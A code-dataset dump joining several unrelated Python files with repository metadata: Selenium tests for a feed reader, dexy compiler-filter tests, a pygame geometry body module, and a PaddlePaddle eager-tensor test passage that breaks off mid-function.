self.assertIn(entry_1_title, entries_titles_from_current_page)
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
entries_titles = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
self.assertEqual(True, entries_titles)
# The user visits the homepage and sees it
self.browser.get(self.live_server_url)
entries_titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles)
def test_can_set_things_to_currently_reading_and_not_currently_reading_on_latest_page(self, func_1, func_2):
# ENSURE THEY ARE ALWAYS LATEST
entry = Entry.objects.first()
entry.published = datetime.datetime.now()
entry.save()
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# The user will open the web page to the homepage
self.browser.get(self.live_server_url+'/latest/')
self.wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR, ".main-title"), "Latest"))
# The user will mark an item as currently reading
entry_1_title = self.wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
entry_1_title = entry_1_title.text
entry_1_currently_reading_button = self.wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, ".entry__currently_reading__btn")))
entry_1_currently_reading_button.click()
# That item will disappear from the page
is_entry_gone = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
self.assertEqual(is_entry_gone, True)
# The user will then go to the current page and see their item
self.browser.get(self.live_server_url + "/current")
entry_1_title = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ][0]
entries_titles_from_current_page = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles_from_current_page)
# The user then decides they want to remove the item from their currently reading list
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
# The user no longer sees the item there
entries_titles = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
# if True then it's invisible
self.assertEqual(True, entries_titles)
self.browser.get(self.live_server_url +'/latest')
entries_titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles)
def test_can_mark_items_as_read_and_unread(self, func_1, func_2):
self.browser.get(self.live_server_url)
entry_1_mark_reading_btn = self.browser.find_elements_by_class_name("entry__seen-unseen__btn")[0]
entry_1_mark_reading_btn.click()
entry_1_mark_reading_btn = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__seen-unseen__btn")))[0]
self.assertNotIn("entry__seen-unseen__btn--unread", entry_1_mark_reading_btn.get_attribute("class"))
entry_1_mark_reading_btn.click()
entry_1_mark_reading_btn = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__seen-unseen__btn")))[0]
self.assertIn("entry__seen-unseen__btn--unread", entry_1_mark_reading_btn.get_attribute("class"))
def test_can_delete_subscription(self, func_1, func_2):
self.browser.get(self.live_server_url)
subscriptions = [sub.text for sub in self.browser.find_elements_by_class_name("subscription")]
self.assertEqual(len(subscriptions), 1)
subscription_delete_btn = self.browser.find_element_by_class_name("subscription__delete")
subscription_delete_btn.click()
self.assertEqual(True, self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".subscription"))))
self.assertEqual([], self.browser.find_elements_by_class_name("entry__title")) | true | true |
f726084efad0da3d822f2612ca1c35a8e0a06715 | 2,932 | py | Python | tests/plugins/test_clang_filters.py | dsoto/dexy | 0f2090250040c3c54c8481a16de8e476b559e87c | [
"MIT"
] | null | null | null | tests/plugins/test_clang_filters.py | dsoto/dexy | 0f2090250040c3c54c8481a16de8e476b559e87c | [
"MIT"
] | null | null | null | tests/plugins/test_clang_filters.py | dsoto/dexy | 0f2090250040c3c54c8481a16de8e476b559e87c | [
"MIT"
] | null | null | null | from tests.utils import assert_output
from tests.utils import wrap
from dexy.doc import Doc
FORTRAN_HELLO_WORLD = """program hello
print *, "Hello World!"
end program hello
"""
CPP_HELLO_WORLD = """#include <iostream>
using namespace std;
int main()
{
cout << "Hello, world!";
return 0;
}
"""
C_HELLO_WORLD = """#include <stdio.h>
int main()
{
printf("HELLO, world\\n");
}
"""
C_FUSSY_HELLO_WORLD = """#include <stdio.h>
int main()
{
printf("HELLO, world\\n");
return 0;
}
"""
C_WITH_INPUT = """#include <stdio.h>
int main()
{
int c;
c = getchar();
while (c != EOF) {
putchar(c);
c = getchar();
}
}
"""
def test_fortran_filter():
assert_output('fortran', FORTRAN_HELLO_WORLD, "Hello, world!", ext=".f")
def test_cpp_filter():
assert_output('cpp', CPP_HELLO_WORLD, "Hello, world!", ext=".cpp")
def test_clang_filter():
assert_output('clang', C_HELLO_WORLD, "HELLO, world\n", ext=".c")
def test_c_filter():
assert_output('gcc', C_HELLO_WORLD, "HELLO, world\n", ext=".c")
assert_output('gcc', C_FUSSY_HELLO_WORLD, "HELLO, world\n", ext=".c")
def test_cfussy_filter():
assert_output('cfussy', C_FUSSY_HELLO_WORLD, "HELLO, world\n", ext=".c")
with wrap() as wrapper:
wrapper.debug = False
doc = Doc("hello.c|cfussy",
contents=C_HELLO_WORLD,
wrapper=wrapper)
wrapper.run_docs(doc)
assert wrapper.state == 'error'
def test_c_input():
with wrap() as wrapper:
node = Doc("copy.c|cinput",
inputs = [
Doc("input.txt",
contents = "hello, c",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert str(node.output_data()) == "hello, c"
def test_clang_input():
with wrap() as wrapper:
node = Doc("copy.c|clanginput",
inputs = [
Doc("input.txt",
contents = "hello, c",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert str(node.output_data()) == "hello, c"
def test_clang_multiple_inputs():
with wrap() as wrapper:
node = Doc("copy.c|clanginput",
inputs = [
Doc("input1.txt",
contents = "hello, c",
wrapper=wrapper),
Doc("input2.txt",
contents = "more data",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert unicode(node.output_data()['input1.txt']) == u'hello, c'
assert unicode(node.output_data()['input2.txt']) == u'more data'
| 24.433333 | 76 | 0.537517 | from tests.utils import assert_output
from tests.utils import wrap
from dexy.doc import Doc
FORTRAN_HELLO_WORLD = """program hello
print *, "Hello World!"
end program hello
"""
CPP_HELLO_WORLD = """#include <iostream>
using namespace std;
int main()
{
cout << "Hello, world!";
return 0;
}
"""
C_HELLO_WORLD = """#include <stdio.h>
int main()
{
printf("HELLO, world\\n");
}
"""
C_FUSSY_HELLO_WORLD = """#include <stdio.h>
int main()
{
printf("HELLO, world\\n");
return 0;
}
"""
C_WITH_INPUT = """#include <stdio.h>
int main()
{
int c;
c = getchar();
while (c != EOF) {
putchar(c);
c = getchar();
}
}
"""
def test_fortran_filter():
assert_output('fortran', FORTRAN_HELLO_WORLD, "Hello, world!", ext=".f")
def test_cpp_filter():
assert_output('cpp', CPP_HELLO_WORLD, "Hello, world!", ext=".cpp")
def test_clang_filter():
assert_output('clang', C_HELLO_WORLD, "HELLO, world\n", ext=".c")
def test_c_filter():
assert_output('gcc', C_HELLO_WORLD, "HELLO, world\n", ext=".c")
assert_output('gcc', C_FUSSY_HELLO_WORLD, "HELLO, world\n", ext=".c")
def test_cfussy_filter():
assert_output('cfussy', C_FUSSY_HELLO_WORLD, "HELLO, world\n", ext=".c")
with wrap() as wrapper:
wrapper.debug = False
doc = Doc("hello.c|cfussy",
contents=C_HELLO_WORLD,
wrapper=wrapper)
wrapper.run_docs(doc)
assert wrapper.state == 'error'
def test_c_input():
with wrap() as wrapper:
node = Doc("copy.c|cinput",
inputs = [
Doc("input.txt",
contents = "hello, c",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert str(node.output_data()) == "hello, c"
def test_clang_input():
with wrap() as wrapper:
node = Doc("copy.c|clanginput",
inputs = [
Doc("input.txt",
contents = "hello, c",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert str(node.output_data()) == "hello, c"
def test_clang_multiple_inputs():
with wrap() as wrapper:
node = Doc("copy.c|clanginput",
inputs = [
Doc("input1.txt",
contents = "hello, c",
wrapper=wrapper),
Doc("input2.txt",
contents = "more data",
wrapper=wrapper)
],
contents = C_WITH_INPUT,
wrapper=wrapper)
wrapper.run_docs(node)
assert unicode(node.output_data()['input1.txt']) == u'hello, c'
assert unicode(node.output_data()['input2.txt']) == u'more data'
| true | true |
f72608bcf3958c08d167921ea51ff86f7896570c | 10,372 | py | Python | pygame_geometry/body.py | MarcPartensky/Pygame-Geometry | 61abbbeac0fd351253e06b19736d9939fd5b316e | [
"MIT"
] | 3 | 2021-01-03T18:13:02.000Z | 2021-06-27T21:29:11.000Z | pygame_geometry/body.py | MarcPartensky/Pygame-Geometry | 61abbbeac0fd351253e06b19736d9939fd5b316e | [
"MIT"
] | null | null | null | pygame_geometry/body.py | MarcPartensky/Pygame-Geometry | 61abbbeac0fd351253e06b19736d9939fd5b316e | [
"MIT"
] | null | null | null | from .abstract import Vector, Point, Segment, Circle
from .anatomies import FormAnatomy
from .motion import Motion, Moment
from .material import Material
from .physics import Physics
from . import colors
from pygame.locals import *
from copy import deepcopy
import pygame
import logging
import copy
import random
import math
# Interface Anatomy
# - show(context) //an anatomy must be responsible for drawing itself
# - __str__() //an anatomy must be able to give a string representation
# - __contains__(point) //an anatomy must be able to tell if a point is in it
# - cross(anatomy) //an anatomy must be able to determine if it is crossing another anatomy
# - recenter()
# - update()
# . center //an anatomy must have a center
# image, segment and form implement anatomy
class Image(Rect):
def __init__(self, filename):
"""Create an image."""
self.surface = pygame.load.image(filename)
def show(self, context):
""""Show the image on the window."""
self.context.draw.blit(self.surface)
class Body(Physics):
@classmethod
def random(cls, n=5, d=2, nm=2, nv=3, borns=[-1, 1]):
"""Create a random body."""
anatomy = FormAnatomy.random(n=n, d=d, borns=borns)
anatomy.recenter(anatomy.centroid)
motions = []
if nm >= 1:
motions.append(Motion.random(n=nv, d=d))
if nm >= 2:
motions.append(Moment.random(n=nv, d=d))
if nm >= 3:
motions.extend([Motion.random(n=nv, d=d) for i in range(nm - 2)])
return cls(anatomy, motions)
@classmethod
def createFromForm(cls, anatomy, motion=Motion(), moment=Moment()):
"""Create a body from an absolute form using its motion and its angular moment."""
motion.position = Vector(*anatomy.center)
anatomy.points = (-motion.position).applyToPoints(anatomy.points)
return cls(anatomy, [motion, moment])
@classmethod
def createFromMotionMoment(cls, anatomy, motion=Motion(), moment=Moment()):
"""Create a body from a relative anatomy, a motion and a moment."""
return cls(anatomy, [motion, moment])
@classmethod
def createFromRandomMotions(cls, anatomy, n=2):
"""Create a body using an anatomy and giving it 'n' random motions."""
motions = []
if n >= 1:
motions.append(Motion.random())
if n >= 2:
motions.append(Moment.random())
if n >= 3:
motions.extend([Motion.random() for i in range(n - 2)])
return cls(anatomy, motions)
def __init__(self, anatomy, motions):
"""Create body using its anatomy, its motion and its angular moment."""
self.anatomy = anatomy
if not isinstance(motions, list):
raise TypeError("Wrong motions: "+str(motions))
super().__init__(motions)
def __str__(self):
"""Return the string representation of the body."""
return type(self).__name__[0].lower() + "(" + str(self.form) + "," + ",".join(map(str, self.motions)) + ")"
def show(self, context):
"""Show the form on the window."""
self.form.show(context)
def showMotion(self, context):
"""Show the motion of the body."""
self.motion.show(context)
def showMoment(self, context):
"""Show the moment of the body from its farthest point."""
form = self.form
position = self.position
distances = [(Segment(p, position).length, p) for p in form.points]
farthest = max(distances, key=lambda c: c[0])[1]
angle = Vector.createFromTwoPoints(position, farthest).angle
self.moment.show(context, farthest, angle)
def showAll(self, context):
"""Show the body and its motions."""
self.show(context)
self.showMotion(context)
self.showMoment(context)
self.showBorn(context)
def showBorn(self, context):
"""Show the born circle of the entity."""
self.getCircle().show(context)
def update(self, dt=1):
"""Update the motions of the body using 'dt'."""
for motion in self.motions:
motion.update(dt)
def updateFriction(self, friction=0.1):
"""Update the frictions of the body using the 'friction'."""
for motion in self.motions:
motion.velocity.norm *= (1 - friction)
def recenter(self):
"""Set the center of the relative anatomy on the origin."""
c = self.anatomy.center
v = -Vector(*c)
self.anatomy.position.set(v)
def getForm(self):
"""Return a copy of the form in absolute coordinates."""
form = copy.deepcopy(self.anatomy)
form.center = Point(*self.motion.position)
if len(self.motions) == 1: # Ugly fix for general case
form.rotate(self.velocity.angle)
else:
form.rotate(self.moment.position.norm)
return form
def setForm(self, form):
"""Set the form of the body using the absolute form."""
self.position.set(Vector(*form.center))
self.anatomy = form.center
form = absolute = property(getForm, setForm)
def __contains__(self, point):
"""Determine if a point is in the body."""
return point in self.form
def react(self, event):
"""React to a given event by making an action."""
pass
def follow(self, point):
"""Update the motion in order for a body to follow a given point."""
position = Vector(*point)
v = position - self.position
self.acceleration.set(v)
def getCenter(self):
"""Return the center."""
return Point(*self.position)
def setCenter(self, center):
"""Set the new center."""
self.position.set(Vector(*center))
center = property(getCenter, setCenter)
def cross(self, other):
"""Determine if the body is crossing with the other body."""
return self.form.cross(other.form)
def collide(self, other):
return self.form.collide(other.form)
def __xor__(self, other):
"""Determine if the body is crossing with the other body using xor method."""
return self.form | other.form
def getPoints(self):
"""Return the points of the form of the body."""
return self.form.points
def setPoints(self, points):
"""Set the points of the form of the body."""
self.form.points = points
points = property(getPoints, setPoints)
def getBorn(self):
return self.anatomy.born
def setBorn(self, born):
self.anatomy.born = born
born = property(getBorn, setBorn)
def getCircle(self):
"""Return the circle that born the body."""
return Circle(*self.position, radius=self.born)
def spread(self, n):
"""Take away the entity by multiplying the norm of the position by n."""
self.position.norm *= n
def enlarge(self, n):
"""Enlarge the anatomy."""
self.anatomy.enlarge(n)
class FrictionBody(Body):
"""Add some friction to a body."""
def __init__(self, *args, friction=0.1):
"""Create a body with friction."""
super().__init__(*args)
self.friction = friction
def update(self, dt):
"""Update the spaceship."""
super().update(dt)
self.updateFriction()
def updateFriction(self):
"""Add some friction."""
self.velocity.norm *= (1 - self.friction)
class MaterialBody(Material):
"""Unlike the other bodies, the material body only has one motion."""
def __init__(self, anatomy, motion):
"""Create a material body from its anatomy and its motion."""
self.anatomy = anatomy
self.motion = motion
@classmethod
def createFromAbsolute(cls, absolute, motion):
"""Create a simple body from its absolute anatomy and its motion."""
return cls(anatomy, motion)
@classmethod
def random(cls, nv=2, d=2):
"""Return a random simple body."""
motion = Motion.random(n=nv, d=d)
anatomy = Form.random(n=5)
return cls(anatomy, motion)
def __init__(self, anatomy, motion):
"""Create a simple body."""
self.motion = motion
self.anatomy = anatomy
self.center()
def __str__(self):
"""Return the string representation of the body."""
return "mb(" + str(self.anatomy) + "," + str(",".join(map(str, self.motion))) + ")"
def center(self):
"""Center the anatomy."""
c = self.anatomy.center
v = -Vector(*c)
self.anatomy.position.set(v)
def show(self, context):
"""Show the simple body on the context."""
self.showAbsolute(context)
self.showMotion(context)
def showAnatomy(self, context):
"""Show the anatomy on the context."""
self.anatomy.show(context)
def showAbsolute(self, context):
"""Show the body on the context."""
self.getAbsolute().show(context)
def showMotion(self, context):
"""Show the motion of the body on the context."""
self.velocity.show(context, self.position)
self.acceleration.show(context, self.position)
def update(self, dt=1):
"""Update the simple body."""
self.motion.update(dt)
def follow(self, position):
"""Follow the cursor."""
a = Vector(*position)
b = self.position
v = Vector(a - b)
self.velocity.angle = v.angle
# self.velocity.norm=min(v.norm,1)
def __contains__(self, other):
"""Determine if the object other is in the absolute anatomy."""
return other in self.getAbsolute()
def getAbsolute(self):
"""Return the absolute anatomy of the body which means its form after
changing the position depending on its motion."""
anatomy = deepcopy(self.anatomy)
anatomy.position = self.motion.position # change its position
anatomy.rotate(self.velocity.angle) # change its rotation
return anatomy
absolute = property(getAbsolute)
class BornShowingBody(Body):
def show(self, context):
super().show(context)
self.showBorn(context)
if __name__ == "__main__":
from .manager import BodyManager
b = BornShowingBody.random()
m = BodyManager(b)
m()
| 31.621951 | 115 | 0.614153 | from .abstract import Vector, Point, Segment, Circle
from .anatomies import FormAnatomy
from .motion import Motion, Moment
from .material import Material
from .physics import Physics
from . import colors
from pygame.locals import *
from copy import deepcopy
import pygame
import logging
import copy
import random
import math
class Image(Rect):
def __init__(self, filename):
self.surface = pygame.load.image(filename)
def show(self, context):
self.context.draw.blit(self.surface)
class Body(Physics):
@classmethod
def random(cls, n=5, d=2, nm=2, nv=3, borns=[-1, 1]):
anatomy = FormAnatomy.random(n=n, d=d, borns=borns)
anatomy.recenter(anatomy.centroid)
motions = []
if nm >= 1:
motions.append(Motion.random(n=nv, d=d))
if nm >= 2:
motions.append(Moment.random(n=nv, d=d))
if nm >= 3:
motions.extend([Motion.random(n=nv, d=d) for i in range(nm - 2)])
return cls(anatomy, motions)
@classmethod
def createFromForm(cls, anatomy, motion=Motion(), moment=Moment()):
motion.position = Vector(*anatomy.center)
anatomy.points = (-motion.position).applyToPoints(anatomy.points)
return cls(anatomy, [motion, moment])
@classmethod
def createFromMotionMoment(cls, anatomy, motion=Motion(), moment=Moment()):
return cls(anatomy, [motion, moment])
@classmethod
def createFromRandomMotions(cls, anatomy, n=2):
motions = []
if n >= 1:
motions.append(Motion.random())
if n >= 2:
motions.append(Moment.random())
if n >= 3:
motions.extend([Motion.random() for i in range(n - 2)])
return cls(anatomy, motions)
def __init__(self, anatomy, motions):
self.anatomy = anatomy
if not isinstance(motions, list):
raise TypeError("Wrong motions: "+str(motions))
super().__init__(motions)
def __str__(self):
return type(self).__name__[0].lower() + "(" + str(self.form) + "," + ",".join(map(str, self.motions)) + ")"
def show(self, context):
self.form.show(context)
def showMotion(self, context):
self.motion.show(context)
def showMoment(self, context):
form = self.form
position = self.position
distances = [(Segment(p, position).length, p) for p in form.points]
farthest = max(distances, key=lambda c: c[0])[1]
angle = Vector.createFromTwoPoints(position, farthest).angle
self.moment.show(context, farthest, angle)
def showAll(self, context):
self.show(context)
self.showMotion(context)
self.showMoment(context)
self.showBorn(context)
def showBorn(self, context):
self.getCircle().show(context)
def update(self, dt=1):
for motion in self.motions:
motion.update(dt)
def updateFriction(self, friction=0.1):
for motion in self.motions:
motion.velocity.norm *= (1 - friction)
def recenter(self):
c = self.anatomy.center
v = -Vector(*c)
self.anatomy.position.set(v)
def getForm(self):
    """Return the absolute form: a deep copy of the anatomy, translated to
    the motion's position and rotated."""
    form = copy.deepcopy(self.anatomy)
    form.center = Point(*self.motion.position)
    if len(self.motions) == 1:
        # No dedicated moment: orient the form along the velocity.
        form.rotate(self.velocity.angle)
    else:
        # With a moment, its position norm supplies the rotation angle —
        # presumably an accumulated angular position; TODO confirm.
        form.rotate(self.moment.position.norm)
    return form

def setForm(self, form):
    self.position.set(Vector(*form.center))
    # NOTE(review): assigning form.center (a Point) to self.anatomy looks
    # suspicious — getForm treats self.anatomy as a full Form; verify
    # whether this should copy the form's geometry instead.
    self.anatomy = form.center

# The absolute form is exposed under both names 'form' and 'absolute'.
form = absolute = property(getForm, setForm)
def __contains__(self, point):
    """Membership test delegates to the absolute form."""
    return point in self.form

def react(self, event):
    # Event hook; intentionally a no-op in this class.
    pass

def follow(self, point):
    """Accelerate toward the given point (acceleration = point - position)."""
    position = Vector(*point)
    v = position - self.position
    self.acceleration.set(v)

def getCenter(self):
    # The body's center is its motion position, viewed as a Point.
    return Point(*self.position)

def setCenter(self, center):
    self.position.set(Vector(*center))

center = property(getCenter, setCenter)
def cross(self, other):
    """Crossing test/points between the two absolute forms (delegated)."""
    return self.form.cross(other.form)

def collide(self, other):
    """Collision test between the two absolute forms (delegated)."""
    return self.form.collide(other.form)

def __xor__(self, other):
    # NOTE(review): named __xor__ but delegates to Form's `|` operator;
    # confirm Form's `|` implements the operation intended for `^` here.
    return self.form | other.form

def getPoints(self):
    return self.form.points

def setPoints(self, points):
    self.form.points = points

points = property(getPoints, setPoints)

def getBorn(self):
    # "born": the anatomy's bounding radius (likely from French "borne").
    return self.anatomy.born

def setBorn(self, born):
    self.anatomy.born = born

born = property(getBorn, setBorn)

def getCircle(self):
    """Bounding circle of radius ``born`` centered on the body position."""
    return Circle(*self.position, radius=self.born)

def spread(self, n):
    # Scale the position's distance from the origin by n.
    self.position.norm *= n

def enlarge(self, n):
    """Scale the anatomy itself by n (delegated)."""
    self.anatomy.enlarge(n)
class FrictionBody(Body):
    """Body whose velocity decays by a fixed friction factor on each update."""

    def __init__(self, *args, friction=0.1):
        super().__init__(*args)
        # Per-update damping factor; 0 keeps velocity, 1 stops immediately.
        self.friction = friction

    def update(self, dt):
        # Unlike Body.update, dt has no default here.
        super().update(dt)
        self.updateFriction()

    def updateFriction(self):
        # Overrides Body.updateFriction (which takes a factor argument and
        # damps every motion) to use self.friction on self.velocity only.
        self.velocity.norm *= (1 - self.friction)
class MaterialBody(Material):
    """A material entity: an anatomy (local geometry) driven by one Motion."""

    @classmethod
    def createFromAbsolute(cls, absolute, motion):
        """Build a MaterialBody from an absolute form and a motion.

        BUG FIX: the body was ``cls(anatomy, motion)`` which raised
        NameError — no ``anatomy`` exists in this scope; the parameter is
        named ``absolute``.
        """
        return cls(absolute, motion)

    @classmethod
    def random(cls, nv=2, d=2):
        """Build a MaterialBody with a random motion and a random 5-point form."""
        motion = Motion.random(n=nv, d=d)
        anatomy = Form.random(n=5)
        return cls(anatomy, motion)

    def __init__(self, anatomy, motion):
        # NOTE(review): the class originally defined __init__ twice; only
        # this (second) definition was ever effective, so the dead first
        # one — identical minus the self.center() call — has been removed.
        self.motion = motion
        self.anatomy = anatomy
        self.center()

    def __str__(self):
        return "mb(" + str(self.anatomy) + "," + str(",".join(map(str, self.motion))) + ")"

    def center(self):
        """Translate the anatomy so its center sits at the local origin."""
        c = self.anatomy.center
        v = -Vector(*c)
        self.anatomy.position.set(v)

    def show(self, context):
        """Draw the absolute form and the motion vectors."""
        self.showAbsolute(context)
        self.showMotion(context)

    def showAnatomy(self, context):
        self.anatomy.show(context)

    def showAbsolute(self, context):
        self.getAbsolute().show(context)

    def showMotion(self, context):
        # Velocity and acceleration are drawn anchored at the position.
        self.velocity.show(context, self.position)
        self.acceleration.show(context, self.position)

    def update(self, dt=1):
        """Advance the motion by the time step dt."""
        self.motion.update(dt)

    def follow(self, position):
        """Point the velocity toward the given position."""
        a = Vector(*position)
        b = self.position
        v = Vector(a - b)
        self.velocity.angle = v.angle

    def __contains__(self, other):
        return other in self.getAbsolute()

    def getAbsolute(self):
        """Absolute form: anatomy copy, moved to the motion position and
        rotated along the velocity."""
        # NOTE(review): uses bare `deepcopy` while Body.getForm uses
        # `copy.deepcopy`; confirm `from copy import deepcopy` exists at
        # module top.
        anatomy = deepcopy(self.anatomy)
        anatomy.position = self.motion.position
        anatomy.rotate(self.velocity.angle)
        return anatomy

    absolute = property(getAbsolute)
class BornShowingBody(Body):
    """Body that always draws its bounding circle along with its form."""

    def show(self, context):
        super().show(context)
        self.showBorn(context)
if __name__ == "__main__":
from .manager import BodyManager
b = BornShowingBody.random()
m = BodyManager(b)
m()
| true | true |
f7260982ff15ee479d978bf2768b0d3f1e8c015c | 22,456 | py | Python | python/paddle/fluid/tests/unittests/test_egr_python_api.py | tangzhiyi11/Paddle | 790cadd1f06fabeadc4b9aeca5622ea50985b990 | [
"Apache-2.0"
] | 1 | 2021-12-31T09:01:02.000Z | 2021-12-31T09:01:02.000Z | python/paddle/fluid/tests/unittests/test_egr_python_api.py | tangzhiyi11/Paddle | 790cadd1f06fabeadc4b9aeca5622ea50985b990 | [
"Apache-2.0"
] | null | null | null | python/paddle/fluid/tests/unittests/test_egr_python_api.py | tangzhiyi11/Paddle | 790cadd1f06fabeadc4b9aeca5622ea50985b990 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid.core as core
import paddle.fluid.eager.eager_tensor_patch_methods as eager_tensor_patch_methods
import paddle
import numpy as np
from paddle.fluid.framework import _test_eager_guard, EagerParamBase, _in_eager_mode
from paddle.fluid.data_feeder import convert_dtype
import unittest
import copy
class EagerScaleTestCase(unittest.TestCase):
    """core.eager.scale smoke tests plus backward() behaviour in eager mode."""

    def test_scale_base(self):
        """Repeated scale() calls keep shape and stop_gradient intact."""
        with _test_eager_guard():
            paddle.set_device("cpu")
            arr = np.ones([4, 16, 16, 32]).astype('float32')
            tensor = paddle.to_tensor(arr, 'float32', core.CPUPlace())
            print(tensor)
            tensor = core.eager.scale(tensor, 2.0, 0.9, True, False)
            for i in range(0, 100):
                tensor = core.eager.scale(tensor, 2.0, 0.9, True, False)
            print(tensor)
            self.assertEqual(tensor.shape, [4, 16, 16, 32])
            self.assertEqual(tensor.stop_gradient, True)

    def test_retain_grad_and_run_backward(self):
        """retain_grads() + backward() must populate the input's grad."""
        with _test_eager_guard():
            paddle.set_device("cpu")
            input_data = np.ones([4, 16, 16, 32]).astype('float32')
            data_eager = paddle.to_tensor(input_data, 'float32',
                                          core.CPUPlace(), False)
            grad_data = np.ones([4, 16, 16, 32]).astype('float32')
            grad_eager = paddle.to_tensor(grad_data, 'float32', core.CPUPlace())
            data_eager.retain_grads()
            out_eager = core.eager.scale(data_eager, 1.0, 0.9, True, True)
            # The grad buffer only materializes after backward().
            self.assertFalse(data_eager.grad._is_initialized())
            out_eager.backward(grad_eager, False)
            self.assertTrue(data_eager.grad._is_initialized())
            self.assertTrue(np.array_equal(data_eager.grad.numpy(), input_data))

    def test_retain_grad_and_run_backward_raises(self):
        """backward() must validate grad_tensor's type and shape."""
        with _test_eager_guard():
            paddle.set_device("cpu")
            input_data = np.ones([4, 16, 16, 32]).astype('float32')
            data_eager = paddle.to_tensor(input_data, 'float32',
                                          core.CPUPlace(), False)
            grad_data = np.ones([4, 16, 16, 32]).astype('float32')
            grad_data2 = np.ones([4, 16]).astype('float32')
            grad_eager = paddle.to_tensor(grad_data, 'float32', core.CPUPlace())
            grad_eager2 = paddle.to_tensor(grad_data2, 'float32',
                                           core.CPUPlace())
            data_eager.retain_grads()
            out_eager = core.eager.scale(data_eager, 1.0, 0.9, True, True)
            self.assertFalse(data_eager.grad._is_initialized())
            # Passing a raw ndarray (not a paddle.Tensor) must raise.
            with self.assertRaisesRegexp(
                    AssertionError,
                    "The type of grad_tensor must be paddle.Tensor"):
                out_eager.backward(grad_data, False)
            # A shape-mismatched grad tensor must raise too.
            with self.assertRaisesRegexp(
                    AssertionError,
                    "Tensor shape not match, Tensor of grad_tensor /*"):
                out_eager.backward(grad_eager2, False)
class EagerDtypeTestCase(unittest.TestCase):
    """paddle.to_tensor must preserve every supported numpy dtype."""

    # NOTE(review): "tesnsor" is a typo for "tensor"; kept as-is because
    # renaming would touch every call site.
    def check_to_tesnsor_and_numpy(self, dtype, proto_dtype):
        """Round-trip an ndarray of `dtype`; check VarType and values."""
        with _test_eager_guard():
            arr = np.random.random([4, 16, 16, 32]).astype(dtype)
            tensor = paddle.to_tensor(arr, dtype)
            self.assertEqual(tensor.dtype, proto_dtype)
            self.assertTrue(np.array_equal(arr, tensor.numpy()))

    def test_dtype_base(self):
        print("Test_dtype")
        self.check_to_tesnsor_and_numpy('bool', core.VarDesc.VarType.BOOL)
        self.check_to_tesnsor_and_numpy('int8', core.VarDesc.VarType.INT8)
        self.check_to_tesnsor_and_numpy('uint8', core.VarDesc.VarType.UINT8)
        self.check_to_tesnsor_and_numpy('int16', core.VarDesc.VarType.INT16)
        self.check_to_tesnsor_and_numpy('int32', core.VarDesc.VarType.INT32)
        self.check_to_tesnsor_and_numpy('int64', core.VarDesc.VarType.INT64)
        self.check_to_tesnsor_and_numpy('float16', core.VarDesc.VarType.FP16)
        self.check_to_tesnsor_and_numpy('float32', core.VarDesc.VarType.FP32)
        self.check_to_tesnsor_and_numpy('float64', core.VarDesc.VarType.FP64)
        self.check_to_tesnsor_and_numpy('complex64',
                                        core.VarDesc.VarType.COMPLEX64)
        self.check_to_tesnsor_and_numpy('complex128',
                                        core.VarDesc.VarType.COMPLEX128)
class EagerTensorPropertiesTestCase(unittest.TestCase):
    """Covers the EagerTensor constructor overloads and EagerParamBase validation."""

    def constructor(self, place):
        """Exercise every EagerTensor constructor variant on `place`."""
        # 1) Default constructor: empty shape, fp32, stop_gradient on.
        egr_tensor = core.eager.EagerTensor()
        self.assertEqual(egr_tensor.persistable, False)
        self.assertTrue("generated" in egr_tensor.name)
        self.assertEqual(egr_tensor.shape, [])
        self.assertEqual(egr_tensor.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor.stop_gradient, True)
        # 2) (dtype, dims, name, type, persistable).
        egr_tensor0 = core.eager.EagerTensor(
            core.VarDesc.VarType.FP32, [4, 16, 16, 32], "test_eager_tensor",
            core.VarDesc.VarType.LOD_TENSOR, True)
        self.assertEqual(egr_tensor0.persistable, True)
        self.assertEqual(egr_tensor0.name, "test_eager_tensor")
        self.assertEqual(egr_tensor0.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor0.dtype, core.VarDesc.VarType.FP32)
        # 3) (ndarray, place, persistable, zero_copy, name, stop_gradient).
        arr0 = np.random.rand(4, 16, 16, 32).astype('float32')
        egr_tensor1 = core.eager.EagerTensor(arr0, place, True, False,
                                             "numpy_tensor1", False)
        self.assertEqual(egr_tensor1.persistable, True)
